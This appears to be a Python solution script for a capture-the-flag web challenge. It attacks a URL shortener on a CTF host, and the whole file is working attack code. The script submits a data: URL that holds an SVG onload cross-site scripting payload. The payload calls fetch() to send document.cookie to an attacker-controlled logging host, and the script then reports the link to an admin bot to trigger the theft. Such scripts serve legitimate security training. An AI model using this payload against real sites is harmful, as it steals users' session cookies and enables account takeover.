26 lines
813 B
Python
26 lines
813 B
Python
import requests
|
|
|
|
ATTACKER_HOST = "http://your.attacker.com/log"
|
|
TARGET = "http://target-ctf.com"
|
|
|
|
# Step 1: Create a shortened URL with a malicious payload
|
|
payload_url = f"data:text/html,<svg onload=fetch('{ATTACKER_HOST}?c='+document.cookie)>"
|
|
|
|
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
|
|
assert res.ok
|
|
print("[+] Shortened URL submitted")
|
|
|
|
# Step 2: Extract short code from the response
|
|
from bs4 import BeautifulSoup
|
|
soup = BeautifulSoup(res.text, "html.parser")
|
|
short_link = soup.find("input", {"id": "shortened"})["value"]
|
|
short_code = short_link.split("/")[-1]
|
|
|
|
# Step 3: Submit to /report endpoint
|
|
report_res = requests.post(f"{TARGET}/report", data={"submit_id": short_link})
|
|
if report_res.ok:
|
|
print(f"[+] Reported to bot: {short_link}")
|
|
else:
|
|
print("[-] Report failed")
|
|
|